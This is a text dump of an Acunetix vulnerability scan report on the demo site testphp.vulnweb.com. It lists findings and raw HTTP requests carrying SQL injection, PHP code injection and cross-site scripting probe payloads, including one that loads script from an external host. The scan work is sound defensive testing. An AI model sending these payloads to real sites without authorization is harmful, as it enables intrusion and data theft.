Detailed Report - WVSSingleScan.pdf

Viewer
Transcript

Acunetix Website Audit 13 October, 2017

Detailed Scan Report

Generated by Acunetix WVS Reporter (v6.0 Build 20081124)

Scan of http://testphp.vulnweb.com:80/ Scan details Scan information Starttime Finish time Scan time Profile

8/21/2017 2:04:33 PM 8/21/2017 2:36:37 PM 32 minutes, 4 seconds default

Server information Responsive Server banner Server OS Server technologies

True nginx/1.4.1 Unknown PHP

Threat level

Alerts distribution Total alerts found High

595 492

Medium

25

Low

25

Informational

53

Knowledge base List of open TCP ports

Acunetix Website Audit

2

DNS server running DNS server running on TCP FTP server running Whois lookup

POP3 server running SSH server running

Acunetix Website Audit

3

List of files with inputs

List of external hosts

Alerts summary Blind SQL/XPath injection Affects /AJAX/infoartist.php /AJAX/infocateg.php /AJAX/infotitle.php /artists.php /listproducts.php /product.php

Acunetix Website Audit

Variations 2 2 2 2 4 2

4

Cross Site Scripting Affects /comment.php /guestbook.php /hpp/ /hpp/params.php /listproducts.php /search.php /secured/newuser.php /showimage.php

Variations 26 105 3 53 42 26 156 46

PHP code injection Affects /comment.php

Variations 2

Proxy accepts CONNECT requests Affects Server

Variations 1

Script source code disclosure Affects /showimage.php

Variations 1

SQL injection Affects /listproducts.php /secured/newuser.php

Variations 14 3

Backup files Affects /index.bak /index.zip

Variations 1 1

Cookie manipulation Affects /comment.php /guestbook.php /hpp/params.php /listproducts.php /search.php /secured/newuser.php /showimage.php

Variations 1 4 2 2 1 5 2

Insecure crossdomain.xml Affects Server

Variations 2

PHPinfo page found Affects /secured/phpinfo.php

Variations 3

Source code disclosure Affects /index.bak

Acunetix Website Audit

Variations 1

5

Application error message Affects /listproducts.php

Variations 4

CVS files found Affects /CVS/Entries /CVS/Repository /CVS/Root

Variations 1 1 1

Directory listing found Affects /admin /CVS /Flash /images /Mod_Rewrite_Shop/images

Variations 1 1 1 1 1

Hidden form input named price was found Affects /product.php

Variations 7

Possible sensitive directories Affects /admin /secured

Variations 1 1

Possible sensitive files Affects /hpp/test.php

Variations 1

URL redirection Affects /redir.php

Variations 1

User credentials are sent in clear text Affects /login.php /signup.php

Variations 1 1

Broken links Affects /Mod_Rewrite_Shop/Details/color-printer/3 /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 /privacy.php

Acunetix Website Audit

Variations 1 1 1 1

6

Email address found Affects / /artists.php /cart.php /categories.php /disclaimer.php /guestbook.php /index.bak /index.php /listproducts.php /login.php /logout.php /product.php /search.php /secured/phpinfo.php /signup.php /userinfo.php

Variations 1 4 8 1 1 2 1 1 8 1 1 8 2 1 1 3

GHDB: Default phpinfo page Affects /secured/phpinfo.php

Variations 1

GHDB: phpinfo() Affects /secured/phpinfo.php

Variations 1

Password type input with autocomplete enabled Affects /login.php /signup.php

Acunetix Website Audit

Variations 1 2

7

Alert details Blind SQL/XPath injection Severity High Type Validation Reported by module MultiRequest parameter manipulation Description

Impact

Recommendation

Affected items /AJAX/infoartist.php Details Request GET /AJAX/infoartist.php?id=1+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:24 GMT Content-Type: text/xml Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /AJAX/infoartist.php Details Request GET /AJAX/infoartist.php?id=1+and+31337-31337=0+--+ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Acunetix Website Audit

8

Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:22 GMT Content-Type: text/xml Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /AJAX/infocateg.php Details Request GET /AJAX/infocateg.php?id=1+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:29 GMT Content-Type: text/xml Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /AJAX/infocateg.php Details Request GET /AJAX/infocateg.php?id=1+and+31337-31337=0+--+ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:27 GMT Content-Type: text/xml Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

9

/AJAX/infotitle.php Details Request POST /AJAX/infotitle.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 26 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm id=1+and+31337-31337=0+--+ Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:15 GMT Content-Type: text/xml Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /AJAX/infotitle.php Details Request POST /AJAX/infotitle.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 22 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm id=1+and+31337-31337=0 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:19 GMT Content-Type: text/xml Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /artists.php Details Request GET /artists.php?artist=1+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Acunetix Website Audit

10

Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /artists.php Details Request GET /artists.php?artist=1+and+31337-31337=0+--+ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=2+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Acunetix Website Audit

11

Request GET /listproducts.php?artist=2+and+31337-31337=0+--+ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=1+and+31337-31337=0+--+ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=1+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:35 GMT Content-Type: text/html Connection: close Acunetix Website Audit

12

/product.php Details Request GET /product.php?pic=1+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /product.php Details Request GET /product.php?pic=1+and+31337-31337=0+--+ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Cross Site Scripting Severity High Type Validation Reported by module Parameter manipulation Description

Acunetix Website Audit

13

Impact

Recommendation

Affected items /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 177 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&comm [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3 B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 141 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=<%00script>alert(550735971577)%3B[email protected]&Su bmit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Acunetix Website Audit

14

Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 163 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28550775971577%29%3B%22%3E&comment=111-222-19 [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 170 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28550685971471%29%3B%22%3E&comment=111 [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

15

/comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 188 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bc omment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 153 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&comment=111-222-1933email@ad dress.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Acunetix Website Audit

16

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 221 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&Submit=Sub mit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 171 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&comment=11 [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Acunetix Website Audit

17

Host: testphp.vulnweb.com Content-Length: 153 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%00'">alert(550925971656)%3B&comment=111-222-1933email@a Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 178 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name="+src="http://testphp.acunetix.com/xss.js?550885971656">&com [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D% 3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 199 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

18

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&Submit=Submit&phpaction=echo%20 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 132 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&Submit=Subm it&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 168 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&comment=111-2 [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Acunetix Website Audit

19

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 159 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%3C/xss/*-*/style=xss:e/**/xpression(alert(551015971731))%3E&comment=111-222-1933em [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 145 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected] t&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:50:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

20

/comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 150 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=>'>alert(550615971471)%3B&comment=111-222-1933email@addre ss.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 153 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=

alert(550905971656)%3B&comment=111-222-1933email@ad dress.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Acunetix Website Audit

21

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 172 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&comment= Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 153 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%00"'>alert(550935971656)%3B&comment=111-222-1933email@ad dress.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 147 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

22

